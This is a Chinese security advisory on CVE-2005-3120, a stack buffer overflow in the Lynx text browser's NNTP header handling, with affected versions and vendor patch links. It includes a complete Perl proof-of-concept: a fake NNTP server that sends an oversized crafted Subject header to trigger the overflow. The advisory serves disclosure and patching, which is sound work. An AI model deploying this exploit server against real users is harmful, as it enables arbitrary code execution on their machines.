安全研究
安全漏洞
Lynx NNTP文章首部处理缓冲区溢出漏洞
发布日期:2005-10-18
更新日期:2005-10-28
受影响系统:
University of Kansas Lynx 2.8.6dev.13不受影响系统:
University of Kansas Lynx 2.8.5
University of Kansas Lynx 2.8.4
University of Kansas Lynx 2.8.3
University of Kansas Lynx 2.8.2
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1
RedHat Enterprise Linux Desktop 4
RedHat Enterprise Linux AS 4
RedHat Enterprise Linux AS 3
RedHat Enterprise Linux AS 2.1
RedHat Desktop 3.0
RedHat Advanced Workstation 2.1 IA64
University of Kansas Lynx 2.8.6dev.14描述:
BUGTRAQ ID: 15117
CVE(CAN) ID: CVE-2005-3120
Lynx是一个基于文本的WWW浏览器。它不能够显示图像或Java句柄,所以执行速度非常快。
Lynx在处理某些畸形的NNTP文章首部时存在缓冲区溢出,成功利用这个漏洞的攻击者可以完全控制EIP、EBX、EBP、ESI和EDI,导致在目标系统中执行任意代码。
当Lynx连接到NNTP服务器获取新闻组中的文章时,会用某些文章首部的信息调用HTrjis()函数。该函数将缺失的ESC字符添加到某些数据以支持亚洲字符组。但是,函数没有检查是否将字符写到了字符数组缓冲区之外,导致栈溢出。
<*来源:Ulf Harnhammar (ulfh@update.uu.se)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112958539504584&w=2
http://lwn.net/Alerts/155984/?format=printable
http://security.gentoo.org/glsa/glsa-200510-15.xml
http://www.debian.org/security/2005/dsa-874
http://www.debian.org/security/2005/dsa-876
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# lynx-nntp-server
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.
use strict;
use IO::Socket;
$main::port = 119;
$main::timeout = 5;
# *** SUBROUTINES ***
sub mysend($$)
{
my $file = shift;
my $str = shift;
print $file "$str\n";
print "SENT: $str\n";
} # sub mysend
sub myreceive($)
{
my $file = shift;
my $inp;
eval
{
local $SIG{ALRM} = sub { die "alarm\n" };
alarm $main::timeout;
$inp = <$file>;
alarm 0;
};
if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; }
$inp =~ tr/\015\012\000//d;
print "RECEIVED: $inp\n";
$inp;
} # sub myreceive
# *** MAIN PROGRAM ***
{
my $server = IO::Socket::INET->new( Proto => 'tcp',
LocalPort => $main::port,
Listen => SOMAXCONN,
Reuse => 1);
die "can't set up server!\n" unless $server;
while (my $client = $server->accept())
{
$client->autoflush(1);
print 'connection from '.$client->peerhost."\n";
mysend($client, '200 Internet News');
my $group = 'alt.angst';
while (my $str = myreceive($client))
{
if ($str =~ m/^mode reader$/i)
{
mysend($client, '200 Internet News');
next;
}
if ($str =~ m/^group ([-_.a-zA-Z0-9]+)$/i)
{
$group = $1;
mysend($client, "211 1 1 1 $group");
next;
}
if ($str =~ m/^quit$/i)
{
mysend($client, '205 Goodbye');
last;
}
if ($str =~ m/^head ([0-9]+)$/i)
{
my $evil = '$@UU(JUU' x 21; # Edit the number!
$evil .= 'U' x (504 - length $evil);
my $head = <<HERE;
221 $1 <xyzzy\@usenet.qx>
Path: host!someotherhost!onemorehost
From: <mr_talkative\@usenet.qx>
Subject: $evil
Newsgroup: $group
Message-ID: <xyzzy\@usenet.qx>
.
HERE
$head =~ s|\s+$||s;
mysend($client, $head);
next;
}
mysend($client, '500 Syntax Error');
} # while str=myreceive(client)
close $client;
print "closed\n\n\n";
} # while client=server->accept()
}
建议:
厂商补丁:
Debian
------
Debian已经为此发布了一个安全公告(DSA-876-1)以及相应补丁:
DSA-876-1:New lynx-ssl packages fix arbitrary code execution
链接:http://www.debian.org/security/2005/dsa-876
RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2005:803-01)以及相应补丁:
RHSA-2005:803-01:Critical: lynx security update
链接:http://lwn.net/Alerts/155984/?format=printable
University of Kansas
--------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
University of Kansas Upgrade lynx2.8.6dev.14.tar.gz
http://lynx.isc.org/current/lynx2.8.6dev.14.tar.gz
Gentoo
------
Gentoo已经为此发布了一个安全公告(GLSA-200510-15)以及相应补丁:
GLSA-200510-15:Lynx: Buffer overflow in NNTP processing
链接:http://security.gentoo.org/glsa/glsa-200510-15.xml
所有Lynx用户都应升级到最新版本:
emerge --sync
emerge --ask --oneshot --verbose ">=www-client/lynx-2.8.5-r1"
浏览次数:3436
严重程度:0(网友投票)
绿盟科技给您安全的保障